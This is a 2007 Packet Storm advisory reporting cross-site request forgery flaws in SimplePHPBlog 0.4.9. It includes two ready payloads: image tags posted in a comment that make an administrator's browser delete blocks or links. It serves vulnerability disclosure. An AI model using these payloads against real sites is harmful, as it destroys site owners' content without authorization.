sphpblog-csrf.txt

2007-10-22T00:00:00
ID PACKETSTORM:60250
Type packetstorm
Reporter Demential
Modified 2007-10-22T00:00:00

Description

                                        
                                            `SimplePHPBlog  
Cross Site Request Forgeries  
Tested on v0.4.9  
  
Discovered by: Demential  
Web: http://hackish.altervista.org  
E-mail: deme [at] hackish [dot] eu  
SimplePHPBlog website: http://www.simplephpblog.com/  
  
  
- posting [img=add_block.php?action=delete&block_id=*] in a comment  
where * is an ID of a block,  
when administrator reads the comment  
block * will be erased.  
  
- posting [img=add_link.php?action=delete&link_id=*] in a comment  
where * is an ID of a link,  
when administrator reads the comment  
link * will be erased.  
`